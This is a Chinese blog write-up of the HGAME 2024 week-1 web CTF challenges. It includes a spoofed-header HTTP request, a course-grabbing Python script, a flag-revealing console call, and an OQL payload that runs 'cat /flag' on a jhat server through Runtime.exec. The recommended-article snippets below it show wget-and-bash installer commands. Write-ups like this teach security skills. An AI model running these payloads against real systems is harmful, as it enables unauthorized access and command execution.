【Web】小白也能看懂的HGAME week1个人wp(全)

已于 2024-02-06 21:49:30 修改
阅读量1.7k 收藏 13
点赞数 17
文章标签: web ctf HGAME week1 wp 网络安全
于 2024-02-06 21:48:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/136051699
版权

目录

ezHTTP

Bypass it

Select Courses

2048*16 

jhat

ezHTTP

exp 如下:
GET / HTTP/1.1
Host: 47.100.137.175:31717
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Vidar; VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
X-Real-IP: 127.0.0.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, / ;q=0.
8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Referer: vidar.club
Content-Length: 2

响应头jwt解密拿到flag

Bypass it

做题的时候直接禁用 js 秒杀就好,但写 wp 换种解法 , 以更深入了解过程。
一个登录框,无法进行注册,用 bp 抓包看看注册页面

只要访问register.php页面,然后post 账号和密码就可以注册完成 

注册成功,用账号密码登录。点这个拿到flag 

hgame{2c02d60e3aa76b219fa14ba060715b168110ed26} 

Select Courses

题目要选全部的课程,但是课都满选不上,发现后台随机一段时间会放出课来,通过抓包发现上传的是id 进行选课,写个脚本,过一段时间自动选课, exp 如下 
import requests
import time
import json
url="http://47.100.137.175:31625/api/courses"


headers = {"Content-Type": "application/json"}
cookie={"PHPSESSID=bc814effa5ab0eade406bfb65865ac5e"}

for i in range(1,6):
    data={"id":i}
    for j in range(1000):
        time.sleep(0.5)
        r = requests.post(url=url, data=json.dumps(data), headers=headers)
        if ':1' not in r.text:
            print(str(i)+"课程抢课成功")
            print(r.text)
            break

url2='http://47.100.137.175:31625/api/ok'
r2=requests.get(url)
print(r2.text)
运行一段时间得到

课都选满了,直接拿flag 

2048*16 

进入页面后看源码,游戏的逻辑代码在 index-_wkhdPNY.js 中,用浏览器调试,开发者模式。注意按以
下截图步骤,先访问网页,再调用开发者工具。

然后让程序一直执行,按F11步入,想快点的话,也可以点一个函数V,在任意处下断点

 然后继续分析代码,发现有个函数如下

函数的主要作用是将一个类似于游戏胜利的信息添加到 DOM 中。如果参数 x 为真,则会将 CSS 类"game-won" 添加到 DOM 元素中,否则会将变量 t 的值添加到 DOM 元素中。具体来说,代码中通过"add" 方法将类名 "game-won" 添加到 DOM 元素的 class 属性中,然后通过数组与索引的方式获取DOM 元素并设置其 textContent 属性为变量 t 的值。
注意 var n=h
进入 console 工作台,输入 s0(h(439),"V+g5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl=QcTq6JkWK4t3") 直接调用,得到flag

jhat

题目提示 rce oql
因为 oql 这块不是很熟
结合关键字去找找有没有相关文章
里面提到可以直接 rce
我们观察到 payload
java.lang.Runtime.getRuntime().exec('calc')
那么就是直接用 Runtime 来命令执行
直接输入 Runtime.getRuntime() 报错
全限定类名就行 java.lang.Runtime.getRuntime()
不出网不能反弹 shell, 经过尝试也不能写文件
考虑 BufferedReader 直接猜 flag 在根目录下于是最终 payload 如下 
new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /flag").getInputStream())).readLine()
 
拿到 flag:hgame{fe31b26ea50a080942180605d1e3de2784ba9a26}
Z3r4y
关注
玩客armbian系统安装宝塔5.9
Terry Chu的博客
09-25 1114
接下来,我们需要打开USBWriter U盘刻录工具,选择下载好的armbian5.88固件,然后选择你插入电脑的U盘(不用格式化,会自动完成所有操作)。使用双公头机线连接好视频接口的USB2,然后用卡针按住RESET复位键,插上电源,等待软件出现连接成功的提示音(“ding”),此时可以松开卡针复位键。有一次,我在上面发现了一个像砖头的设备,很多人都在卖,价格不贵,大约40元左右,大家都称它为“老母鸡”,真是挺有趣的!我立刻下载了固件和相关教程,但遗憾的是,我没有找到特别详细的教程。
玩客安装armbian5.9后后续安装宝塔7.7版本
热门推荐
m0_61444659的博客
04-30 91万+
因为armbian版本是32位的,因为玩客CPU是s805是32位的,虽然可以安装宝塔最后一个32位的5.9的版本,但是有很多的软件都比较老。然后SSH中执行命令 bt 1 后面会不会报错或者直接输入 bt 14 查看内网面板链接可不可以进入。重启完成以后输入bt 1 bt 14 或者输入bt后输入序号就行了。所以就要改一下官网下载的脚本这里下载。编辑文件 /etc/rc.local。再下载文件导入到/root目录。跑完要好久的时间,慢慢等吧。好了之后直接执行安装脚本。上传到/root目录。
联想粒子矿/我家OMV(Open Media Vault) Armbian后如何安装Docker,换软件源并提速?通电两三分钟就掉盘,硬改解决办法
05-21 5万+
联想粒子矿/我家OMV(Open Media Vault) , 线图文教程 粒子,硬盘扔到了黑群上,盒子没解绑,就只能机折腾。 我的粒子盒子是SS1版本,枪灰色,按着W大的教程了OMV0.7.9,后来看到新版的OMV,又想再没成功,具体表现是看AnroidTool的提示是入Maskrom了,却不进固件,短接进Maskrom后可。但每次机都要拆机短接特别不爽,于是就琢...
飞牛简洁版ipv4+ipv6访问(有v6公网情况下)
最新发布
打工仔的博客
04-11 1364
双栈协议是 IPv4IPv6 过渡的 “润滑剂”,通过同时支持两种协议,实现了新旧网络的无缝衔接,降低了升级风险和成本。IPv4 采用 32 位地址,理论上仅有约 43 亿个地址,随着联网设备爆发式增长(如智能手机、物联网设备),可用地址已濒临耗尽。IPv4 作为运行了数十年的基础协议,目前仍是全球互联网的主要承载者,支撑着绝大多数家庭、企业网络及公共服务。两种协议栈,使设备能够同时支持两种网络层协议,实现对两种地址(IPv4 地址和 IPv6 地址)的独立处理和通信。5、最关键,创建代理。
[教程] 我家armbian+安装LMS
cheng1999_cn1的博客
06-14 1万+
我家armbian+安装LMS 我家介绍 CPU: RK3328 内存: 1G emmc: 8G 网口: 千兆 USB接口: USB2.0x1 USB3.0x1 HDMI接口: 1个(主板上有一个,但是被外壳遮住,不能用) SATA接口: 一个(是由USB3.0改成SATA的) 我家是矿难产物,目前闲鱼不·含硬盘的价格是: 100元左右。 我家机用软件: 链接:https://pan.baidu.com/s/18sOX1sjuNqgAt4bl8Yx0NQ 提取码:cqzz 一.armbian
开启 Cloudflare CDN 代理,实现 IPv4 to IPv6 转换
Ccccxc的博客
06-05 3万+
通过将域名托管到Cloudflare,并开启CDN代理,从而实现IPv6 网络环境下对纯 IPv6 源站的访问。本文将详细介绍如何将腾讯域名托管至Cloudflare,如何开启CDN代理和有效性验证,以及如何修改DDNS配置实现基于Cloudflare的动态域名解析
关于 armbian ubantu系统 安装宝塔面板
qq_45576664的博客
07-19 2242
armbian ubantu系统 安装宝塔面板
HK1Box,在armbian上基于docker安装宝塔
cpfwmsx的专栏
03-23 4044
提示:hk1box是一款机顶盒,可以在tb/pdd等网购平台买到,这里不做推荐。众所周知,HK1Box是一款性能不错的外贸盒子,拥有4G运行内存,至少有32G的板载硬盘,平日里如果没有时间看电视,与其吃灰,不如装成armbian,然后装个服务器折腾也不错,以下就是使用armbian安装宝塔的示例。为何要用docker,主要是折腾的时候,如果把系统弄坏了,armbian稍嫌麻烦,如果一切都在虚拟机或者容器内,则省去了重装系统的时间。
cloudflare-ddns-script:CloudFlare ddns 树莓派IPV6 DDNS解决方案
05-06
本脚本是基于cloudflare API的DDNS脚本,支持IPV4IPV6,可通过网络方式和本地方式获取脚本安装主机的IP地址,理论支持所有使用linux系统的主机,已在debianubuntu上测试可用。 使用脚本前需要做的 一台可联网的...
Cloudflare-DDNS:用于Cloudflare的简单DynDNS API,用于自托管| QNAP与Synology NAS的理想选择
05-24
Cloudflare-DDNS 用于Cloudflare的简单DynDNS API,用于自托管| QNAP与Synology NAS的理想选择 有了这个小巧但美观的界面,就可以托管自己的api以便在QNAP或Synology NAS系统上为您的DynDNS使用Cloudflare域该API...
cloudflare-ddns-4padavan:使用cloudflare API为Padavan定制ddns shell脚本
05-13
Cloudflare-DDNS-4Padavan 是一个专门为Padavan路由器定制的动态DNS(DDNS)解决方案,利用Cloudflare的API来实现。这个项目的核心是通过Shell脚本来自动化更新路由器的公网IP地址,确保即使公网IP发生变化,用户也...
cloudflare-api-v4-ddns:Bash中的Cloudflare API v4动态DNS更新
05-24
标签 "cloudflare bash-script cloudflare-api ddns-updater cloudflare-ddns Shell" 指示了这个项目涉及的技术领域。`cloudflare-api-v4-ddns-master` 文件名可能是项目的主目录,包含着用于实现这一功能的所有源...
cloudflare-ddns.js:仅通过调用URL即可更新Cloudflare记录的Node脚本
05-16
git clone git@github.com:th3m4ri0/cloudflare-ddns.js.git npm install export API_KEY= export EMAIL= export SECRET= export DOMAIN= export SUBDOMAIN= node index.js 如何在Heroku上进行设置 使
群晖cloudflare 代理ipv6实现外网ipv4网络访问(2023可用)
wamaqa
12-13 1万+
适用场景:群晖nas在外网用ipv6可以访问,但是很多情况在外面使用ipv4,无法连接ipv6的情况。
玩客Armbian5.88后安装宝塔7.4 通过Node.js实现某zi
m0_62381475的博客
09-15 3804
BT7.4通过wget-O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh &&bash install.sh无法安装。输入node XXX.js(自己下载的脚本)(如果前面建立了TestProject文件夹,就要把脚本文件上传到TestProject文件夹,并进入文件夹运行命令)可以按照自己的喜好重命名。用记事本打开之后,在下面选中的句子之前加“#”,注释之后,保存退出。安装界面,下载比较缓慢,耐心等待的时候,写了这篇教程。
ipv4ipv6访问
m0_37642477的博客
03-04 6319
title: ipv4ipv6访问 date: ‘2020-12-14 00:29:47’ updated: ‘2020-12-14 00:29:47’ tags: [Linux] permalink: /articles/2020/12/14/1607876987147.html 双栈技术 双栈接入是设备运用双协议栈技术,既能和IPv4网络通信,又能和IPv6网络通信。如果这台设备是一个路由器,那么这台路由器的不同接口上,分别配置了IPv4地址和IPv6地址,并很可能分别连接了IPv4网络和IPv6网络
【群晖IPV6访问,求助!!!关于cloudflareipv4访问ipv6
qq_26937761的博客
04-12 933
ddnsgo使用的cloudflare的dns,登陆后,显示群晖提示登陆已失效,重新登陆,这是怎么回事。用腾讯的dns就正常访问,用cloudflare的dns就会显示群晖提示登陆已失效。
armbian ddns
qq_24768591的博客
02-08 1110
Feb 08 15:19:59 onecloud ddns-go[23237]: 请手动打开浏览器并访问 http://127.0.0.1:9876 进行配置。Feb 08 15:19:59 onecloud ddns-go[23237]: 2024/02/08 15:19:59 监听 :9876。
Centos下一键搭建LNMP环境
五环小胖子的博客
05-29 203
描述 下载安装脚本 全部安装 单独安装 后续操作 下载说明 描述 centos_lnmp_setup-1.0是针对Centos部署php+nginx+mysql+redis的一键安装包,包括软件:php-5.5.25,nginx-1.7.2,mysql-5.6.24,redis-3.0.4。后续升级工作还在紧锣密鼓的进行中… 该安装包暂不...
armbian系统安装宝塔
07-15
### 回答1: Armbian是一种针对ARM架构的开源操作系统,宝塔是一款非常方便的服务器管理面板。在Armbian系统上安装宝塔可以帮助用户更轻松地管理服务器。 首先,我们需要根据所使用的硬件平台选择合适的Armbian镜像文件进行系统安装。可以通过Armbian官方网站下载相应版本的镜像文件。 然后,将下载好的Armbian镜像文件烧录到SD卡中,可以使用工具如Etcher进行操作。将烧录好的SD卡插入需要安装Armbian系统的设备。 接下来,将设备接通电源,启动设备并通过串口或者HDMI显示器等方式进入到Armbian系统。根据提示完成基本的系统设置,包括设置用户名、密码等。 打开终端,在命令行中输入以下命令进行更新系统: ``` sudo apt update sudo apt upgrade ``` 然后,我们需要安装宝塔面板的依赖库。在终端中输入以下命令: ``` wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ``` 执行完上述命令后,会自动下载并安装宝塔面板安装过程可能需要一段时间,请耐心等待。 安装完成后,可以通过浏览器访问服务器的IP地址,进入到宝塔面板的登录界面。输入之前设置的用户名和密码,即可成功登录。 在宝塔面板中,用户可以进行一些服务器管理操作,包括添加网站、配置FTP服务器、安装数据库等等。通过宝塔面板,可以更加直观和方便地管理Armbian系统。 需要注意的是,由于Armbian系统是一个开源社区项目,安装宝塔面板可能会遇到一些兼容性或者稳定性的问题。如果在安装或使用过程中遇到问题,可以参考Armbian官方论坛或宝塔官方社区寻求帮助。 ### 回答2: Armbian系统是一款基于Ubuntu/Debian的开源操作系统,主要用于单板计算机,如树莓派和橙派等。宝塔面板是一款简单易用的Web服务器管理面板工具,能够提供一站式的服务器管理和在线应用部署。 要在Armbian系统上安装宝塔面板,需要按照以下步骤进行操作: 1. 登录到你的Armbian系统,并以root用户身份运行终端。 2. 首先,需要确保系统中已经安装了必要的依赖软件,包括curl和wget。可以使用以下命令来安装: ``` apt-get install curl wget -y ``` 3. 安装宝塔面板安装脚本。可以使用curl命令来下载安装脚本,并运行脚本进行安装: ``` curl -sSO http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install-ubuntu_6.0.sh ``` 注意:安装过程可能需要较长时间,请耐心等待。 4. 安装完成后,会显示一个管理员登录地址和用户名/密码信息。可以通过访问该地址,在浏览器中登录宝塔面板进行管理。 5. 在登录宝塔面板后,可以进行一系列的服务器管理操作,包括网站创建、数据库配置、SSL证书安装等。 总结:通过以上步骤,我们可以在Armbian系统上成功安装宝塔面板,并且可以使用它来轻松管理和部署各种Web应用程序。 ### 回答3: 要在Armbian系统上安装宝塔面板,您可以按照以下步骤进行操作: 1. 首先,使用SSH(或其他远程连接工具)登录到您的Armbian系统。 2. 确保您的系统已经更新到最新版本。您可以使用以下命令进行系统更新: ``` sudo apt update sudo apt upgrade ``` 3. 下载宝塔面板安装脚本。您可以使用以下命令下载安装脚本: ``` wget -O install.sh http://download.bt.cn/install/install_6.0.sh ``` 4. 运行安装脚本。使用以下命令运行安装脚本: ``` sudo bash install.sh ``` 安装过程可能需要一些时间,请耐心等待。 5. 安装完成后,您可以通过浏览器访问http://服务器IP地址:8888登录宝塔面板,其中服务器IP地址是您的Armbian系统的IP地址。 6.首次登录系统会要求您设置管理员用户名和密码。请按照提示进行设置。 7. 登录成功后,您就可以使用宝塔面板管理您的Armbian系统了。宝塔面板提供了丰富的功能和工具,包括网站管理、数据库管理等。 请注意,安装宝塔面板可能会对系统进行一些配置更改和安装依赖项,因此请确保在执行此操作之前备份重要数据,以防发生意外情况。此外,宝塔面板是一个强大的工具,但也需要一定的系统资源,特别是在资源受限的设备上,使用时请注意系统的负载情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值